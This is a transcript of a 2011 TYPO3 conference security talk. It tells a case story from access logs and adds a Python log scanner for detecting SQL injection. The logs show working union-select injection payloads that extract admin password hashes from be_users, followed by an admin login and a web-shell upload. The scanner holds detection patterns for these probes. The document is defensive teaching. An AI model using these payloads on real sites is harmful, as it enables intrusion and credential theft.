TYPO3 Security - Risks and Mitigation
  1. TYPO3 Conference - San Francisco 2011: TYPO3 Security - Risks and Mitigation
  2. T3CON11 San Francisco, TYPO3 Security - Risks and Mitigation, 10.06.2011, Helmut Hummel <helmut.hummel@typo3.org>
  3. Introduction: About me
     - Involved in the TYPO3 project since 2005
     - Member of the TYPO3 Security Team since 2008
     - TYPO3 Security Team Leader since 2009
     - TYPO3 Core Team Member since 2011
     - Employed at naw.info in Hannover, Germany
     - Twitter: helhum
     - Blog: http://www.naw.info/blogs/typo3security/
  4. Agenda
     - What is Security?
     - General Security Concepts
     - Attack Vectors
     - Knowing the Enemy: A Case Story
     - Mitigation
     - TYPO3 Security Team
  5. What is Security?
  6. Is TYPO3 secure? Is my TYPO3 site secure?
  7-10. What is Security? Criteria for Security
     - Privacy
     - Integrity and Property
     - Availability and Intentional Use
  11. "Security is a process, not a product." (Bruce Schneier)
  12-15. What is Security? Security is a process
     - Care taking and improvements over time
     - Depending on your needs
     - Nothing is secure! Something can only be not insecure at a particular time
  16-19. What is Security? Why TYPO3 can be considered to be not insecure
     - The TYPO3 Security Team takes care
     - Highly customizable for your needs
     - Few critical security issues over time
  20. General Security Concepts
  21-26. General Security Concepts
     - Defense in depth
     - Minimize exposure / least privilege
     - Do not rely on security by obscurity
     - Log activities
  27. Attack Vectors
  28-34. Attack Vectors
     - Security issues in outdated TYPO3 versions
     - Security issues in (outdated) TYPO3 extensions
     - Security issues in TypoScript
     - Simple passwords
     - Compromised PC with FTP access
     - Other software on the web server
  35. Knowing the Enemy
  36. Knowing the Enemy: The incident, how did it happen?
      The site was serving a hidden <div style="display:none;"> stuffed with dozens of injected spam links to software cracks (the slide shows the raw link list).
  37. Knowing the Enemy: Searching for vulnerabilities
      178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 20054383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
  38. Knowing the Enemy: Searching for vulnerabilities
      178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ HTTP/1.1" 20054383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
  39-42. Knowing the Enemy: Searching for vulnerabilities
      14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010
      14:03:21: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010
      14:03:42: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010
      14:04:15: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 --
  43. Knowing the Enemy: Found something!
      14:04:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010order by 10 --
  44. Knowing the Enemy: Forging the exploit
      14:08:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --
  45. Knowing the Enemy: Exploit working!
      14:09:04: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=-2010union select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 from be_users where admin=1 --
      Now the hacker has the md5 hashes of all admin passwords.
  46. Knowing the Enemy: 15 minutes later: Log in as admin!
      14:21:48: /typo3/index.php
      14:21:50: /typo3/backend.php
  47. Knowing the Enemy: Uploading web shell
      14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/
      14:22:46: /typo3conf/ext/realurlmanagement/title.php
      You lose!
  48-53. Knowing the Enemy: Conclusion
     - Hackers know what they are doing
     - They know TYPO3 very well
     - They also use automated tools
     - They often try to obfuscate the hack
     - With automated attacks, effort is low and gain is high
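The case story above is visible in the access log minutes before the admin login, so a defender's counterpart is a log triage that URL-decodes every query parameter and flags the probe patterns the slides show. This is an added example, not code from the talk or the TYPO3 project; the log lines are constructed to mirror the slides' excerpts, and the assumption that parameters named `[uid]` and `[year]` must be integers is the example's own.

```python
"""Access-log triage for the SQL injection probes shown in the case story."""
import re
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines modelled on the slides' excerpts; IP, host,
# timestamps, sizes and user agents are illustrative, not real traffic.
SAMPLE_LOG = """\
178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
178.122.0.0 - - [17/Dec/2010:14:04:38 +0100] "GET /gallery/?tx_galleryexample_pi2%5Buid%5D=979&tx_galleryexample_pi2%5Byear%5D=2010order%20by%2010%20-- HTTP/1.1" 200 1201 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
10.1.2.3 - - [17/Dec/2010:14:05:02 +0100] "GET /gallery/?tx_galleryexample_pi2%5Buid%5D=979&tx_galleryexample_pi2%5Byear%5D=2010 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [ts] "METHOD url proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Signature checks run on the *decoded* value of every query parameter.
# No leading word boundary on purpose: the probes on the slides glue the
# keyword to the original value ("2010order by 10", "-2010union select1,2").
SIGNATURES = {
    "union_select": re.compile(r"union\s+(?:all\s+)?select", re.I),
    "order_by_probe": re.compile(r"order\s+by\s+\d+", re.I),
    "group_concat": re.compile(r"group_concat\s*\(", re.I),
    "trailing_sql_comment": re.compile(r"--\s*$"),
}
# Parameters a plugin should treat as integers (assumption for this demo,
# taken from the parameter names in the slides' URLs).
INT_PARAM_RE = re.compile(r"\[(?:uid|year)\]$")


def classify_value(name: str, value: str) -> list[str]:
    """Return the reasons a decoded parameter value looks hostile ([] if clean)."""
    reasons = [tag for tag, rx in SIGNATURES.items() if rx.search(value)]
    if INT_PARAM_RE.search(name) and not re.fullmatch(r"-?\d+", value.strip()):
        reasons.append("non_numeric_int_param")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse each line; return one finding per request carrying hostile params."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        query = urlsplit(m["url"]).query
        hits = {}
        # parse_qsl turns '+' into spaces and percent-decodes names and values,
        # so "93+union+select" and "2010order%20by" are both seen in clear text
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(name, value)
            if reasons:
                hits[name] = reasons
        if hits:
            findings.append({
                "ip": m["ip"],
                "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
                "status": int(m["status"]),
                "params": hits,
            })
    return findings


def probe_window_seconds(findings: list[dict]) -> dict[str, int]:
    """Seconds between the first and last hostile request per source IP."""
    first, last = {}, {}
    for f in findings:
        first.setdefault(f["ip"], f["time"])
        last[f["ip"]] = f["time"]
    return {ip: int((last[ip] - first[ip]).total_seconds()) for ip in first}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["time"].isoformat(), f["ip"], f["status"], f["params"])
    print("probe window per IP:", probe_window_seconds(found))
```

The status column matters for triage: a 200 on a request carrying a union select means the plugin did not reject the value, which is exactly the gap an integer cast (intval) on uid and year would have closed.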
  54. Mitigation
  55-60. Mitigation: Mandatory steps
     - Monitor and back up your website
     - Read the announce mailing list and security bulletins carefully
     - Use up-to-date software
     - Use saltedpasswords and advise your admins (and users) to use non-obvious passwords
     - Make your integrators aware of possible TypoScript problems
  61-65. Mitigation: Advanced steps
     - Use TYPO3 core features in favour of extensions
     - Use protected backend access
     - Consider using mod_security
     - Consider using the phpids TYPO3 extension
  66. TYPO3 Security Team
  67-71. TYPO3 Security Team: Important things to know
     - Responsible Disclosure Policy
     - One communication channel (security@typo3.org)
     - Pre-announcements for critical issues only
     - You can support us
  72. Resources
     - PHP-Sicherheit (Christopher Kunz and Stefan Esser)
     - Essential PHP Security (Chris Shiflett)
     - http://www.owasp.org/
     - http://typo3.org/teams/security/security-bulletins/
     - http://typo3.org/teams/security/resources/
     - http://buzz.typo3.org/teams/security/
  73. Questions?
  74. Thank You!
  75. inspiring people to share.